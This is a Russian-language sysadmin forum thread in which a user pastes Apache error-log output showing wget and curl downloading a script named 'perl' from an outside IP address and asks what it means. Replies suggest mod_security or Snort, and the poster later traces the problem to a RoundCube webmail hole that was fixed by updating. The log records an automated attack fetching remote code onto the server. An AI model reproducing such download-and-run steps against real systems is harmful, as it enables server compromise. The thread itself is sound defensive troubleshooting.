The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]




Версия для распечатки Пред. тема | След. тема
Новые ответы [ Отслеживать ]
попытки атак через apache?, !*! dmg2k, 18-Янв-11, 16:24  [смотреть все]
в error log  Apache/2.2.8 на CentOS периодически встречаются такие записи:

--2011-01-17 03:04:36--  http://219.159.68.212:8080/.../perl
Connecting to 219.159.68.212:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 38205 (37K) [text/plain]
Saving to: `perl'

     0K .......... .......... .......... .......              100% 32.3K=1.2s

2011-01-17 03:04:38 (32.3 KB/s) - `perl' saved [38205/38205]

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
:00:06 15122^M100 38205  100 38205    0     0  19982      0  0:00:01  0:00:01 --:--:-- 33308
sh: fetch: command not found
sh: lynx: command not found
perl: no process killed

IP адреса всё время разные, название файла или perl или blue. Что такое происходит? и как с этим бороться? В других логах эти адреса не появляются. Апач стоит за nginx

  • попытки атак через apache?, !*! MrSixties, 16:24 , 19-Янв-11 (1)
    Посмотрите в логе какой был запрос, выясните куда (к какому скрипту, например) обращался этот запрос и т.п. Судя по всему это какой-то скрипт, который в автоматическом режиме "тыкается" сервера. Удостоверьтесь, что у вас "дыры", через которые лезет скрипт закрыты и, в принципе можете не беспокоиться. Хотя, как вариант можете попробовать поставить mod_security или на худой конец Snort - хотя бы на некоторое время, может распознает что-то.
    P.S. Вы не могли бы выслать мне все логи сервера, связанные с этой гипотетической атакой? Очень интересно было бы поизучать. Если бы Вы это сделали был Вам премного благодарен!

  • попытки атак через apache?, !*! dmg2k, 19:59 , 14-Фев-11 (3)
    больше ни в каких логах эта проблема не проявлялась. Все дело оказалось в дыре в веб-почте roundcube, через которую и происходили попытки атак, которые проявляли себя в том числе периодическими подвисаниями процесса apache. После обновления roundcube проблема исчезла.



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру